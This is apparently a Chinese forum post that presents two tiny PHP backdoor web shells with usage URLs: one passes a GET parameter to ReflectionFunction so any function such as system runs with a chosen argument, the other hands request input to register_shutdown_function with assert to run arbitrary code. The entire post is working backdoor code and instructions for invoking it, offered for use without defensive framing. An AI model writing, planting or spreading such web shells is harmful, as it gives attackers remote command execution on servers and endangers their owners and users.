使用方法:

back.php?m=system&c=ipconfig

1
2
3
4
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>

另外一种类型的后门

back.php?e=assert&pass=phpinfo();

1
2
3
4
<?php
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);
?>

感谢楼下老哥的指正,之前写的有点问题。3q